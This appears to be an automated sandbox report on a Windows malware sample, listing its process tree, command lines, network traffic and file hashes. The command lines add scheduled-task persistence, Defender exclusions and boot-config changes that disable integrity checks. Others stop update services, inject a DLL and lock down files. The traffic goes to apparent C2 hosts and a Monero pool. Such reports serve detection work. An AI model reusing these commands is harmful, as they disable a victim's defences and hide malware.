PID 2748 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\9398.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe
PID 2748 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\9398.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe
PID 2748 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\9398.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe
PID 2748 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\9398.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe
PID 2832 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe
PID 2832 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe
PID 2832 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe
PID 2832 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe
PID 2832 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe
PID 2832 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe
PID 2832 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe
PID 1184 wrote to memory of 2616 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\9697.bat
PID 1184 wrote to memory of 2616 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\9697.bat
PID 1184 wrote to memory of 2616 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\9697.bat
PID 1184 wrote to memory of 2616 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\9697.bat
PID 2616 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\9697.bat C:\Windows\system32\cmd.exe
PID 2616 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\9697.bat C:\Windows\system32\cmd.exe
PID 2616 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\9697.bat C:\Windows\system32\cmd.exe
PID 2616 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\9697.bat C:\Windows\system32\cmd.exe
PID 2904 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe
PID 2904 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe
PID 2904 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe
PID 2904 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe
PID 2904 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe
PID 2904 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe
PID 2904 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe
PID 2580 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\956D.exe C:\Windows\SysWOW64\WerFault.exe
PID 2580 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\956D.exe C:\Windows\SysWOW64\WerFault.exe
PID 2580 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\956D.exe C:\Windows\SysWOW64\WerFault.exe
PID 2580 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\956D.exe C:\Windows\SysWOW64\WerFault.exe
PID 2164 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe
PID 2164 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe
PID 2164 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe
PID 2164 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe
PID 2164 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe
PID 2164 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f.exe

"C:\Users\Admin\AppData\Local\Temp\dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f.exe"

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1864 -s 68

C:\Users\Admin\AppData\Local\Temp\9398.exe

C:\Users\Admin\AppData\Local\Temp\9398.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe

C:\Users\Admin\AppData\Local\Temp\956D.exe

C:\Users\Admin\AppData\Local\Temp\956D.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe

C:\Users\Admin\AppData\Local\Temp\9697.bat

"C:\Users\Admin\AppData\Local\Temp\9697.bat"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\976F.tmp\9770.tmp\9781.bat C:\Users\Admin\AppData\Local\Temp\9697.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2580 -s 132

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe

C:\Users\Admin\AppData\Local\Temp\9A9D.exe

C:\Users\Admin\AppData\Local\Temp\9A9D.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1DQ73CJ8.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1980 -s 280

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1976 -s 132

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/

C:\Users\Admin\AppData\Local\Temp\9E85.exe

C:\Users\Admin\AppData\Local\Temp\9E85.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:740 CREDAT:275457 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2212 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\A105.exe

C:\Users\Admin\AppData\Local\Temp\A105.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\CE8B.exe

C:\Users\Admin\AppData\Local\Temp\CE8B.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231010200457.log C:\Windows\Logs\CBS\CbsPersist_20231010200457.cab

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {C3C3FD00-E357-42FE-8FF7-5B188E97582D} S-1-5-21-3513876443-2771975297-1923446376-1000:GPFFWLPI\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\11A4.exe

C:\Users\Admin\AppData\Local\Temp\11A4.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Local\Temp\1BA4.exe

C:\Users\Admin\AppData\Local\Temp\1BA4.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2596 -s 508

C:\Users\Admin\AppData\Local\Temp\20D3.exe

C:\Users\Admin\AppData\Local\Temp\20D3.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {0C6FBAF0-91A8-48B7-B53B-24DD5820A030} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Windows\system32\schtasks.exe

schtasks /delete /tn "csrss" /f

C:\Windows\system32\schtasks.exe

schtasks /delete /tn "ScheduledUpdate" /f

Network

Country Destination Domain Proto
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.facebook.com udp
RU 5.42.65.80:80 5.42.65.80 tcp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 8.8.8.8:53 facebook.com udp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.35:443 facebook.com tcp
CZ 157.240.30.35:443 facebook.com tcp
US 8.8.8.8:53 fbcdn.net udp
CZ 157.240.30.35:443 fbcdn.net tcp
CZ 157.240.30.35:443 fbcdn.net tcp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
US 8.8.8.8:53 accounts.youtube.com udp
NL 142.250.179.206:443 accounts.youtube.com tcp
NL 142.250.179.206:443 accounts.youtube.com tcp
US 8.8.8.8:53 fbsbx.com udp
CZ 157.240.30.35:443 fbsbx.com tcp
CZ 157.240.30.35:443 fbsbx.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
FI 77.91.68.29:80 77.91.68.29 tcp
TR 185.216.70.222:80 185.216.70.222 tcp
US 8.8.8.8:53 57ecd74f-d53f-4408-b3be-5b599e5da474.uuid.cdntokiog.studio udp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.79.68:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
FI 77.91.68.29:80 77.91.68.29 tcp
MD 176.123.9.142:37637 tcp
US 8.8.8.8:53 bytecloudasa.website udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
NL 85.209.176.171:80 85.209.176.171 tcp
US 8.8.8.8:53 api.ip.sb udp
US 172.67.75.172:443 api.ip.sb tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 104.21.61.162:80 bytecloudasa.website tcp
NL 194.169.175.127:80 host-host-file8.com tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 bytecloudasa.website udp
US 104.21.61.162:80 bytecloudasa.website tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 vsblobprodscussu5shard58.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard58.blob.core.windows.net tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 server11.cdntokiog.studio udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun4.l.google.com udp
JP 172.217.213.127:19302 stun4.l.google.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
BG 185.82.216.49:443 server11.cdntokiog.studio tcp
US 8.8.8.8:53 walkinglate.com udp
US 188.114.96.0:443 walkinglate.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
FR 51.255.34.118:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:443 pastebin.com tcp
FR 212.47.253.124:14433 xmr-eu1.nanopool.org tcp
US 188.114.97.0:443 walkinglate.com tcp
US 8.8.8.8:53 stun1.l.google.com udp
IN 172.253.121.127:19302 stun1.l.google.com udp

Files

memory/1944-2-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1944-0-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1944-4-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1944-5-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1944-6-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1184-7-0x0000000002AA0000-0x0000000002AB6000-memory.dmp

memory/1944-8-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9398.exe

MD5 d295489cc7f06e3229a08715c3d73814
SHA1 0fd98d23821878adace03323948a2c2718222ffd
SHA256 b3b7fcec7c3996c4124f5bdba514b32124a8ab446ac00dea435b60b1f7e88769
SHA512 314d280da49ebd98c99217551f5262037866f73c11a7477c729364ede03dafd3a5615671925b2826354d5e8a5dcb3dea73f38519ff5bed642c1428224461d451

C:\Users\Admin\AppData\Local\Temp\9398.exe

MD5 d295489cc7f06e3229a08715c3d73814
SHA1 0fd98d23821878adace03323948a2c2718222ffd
SHA256 b3b7fcec7c3996c4124f5bdba514b32124a8ab446ac00dea435b60b1f7e88769
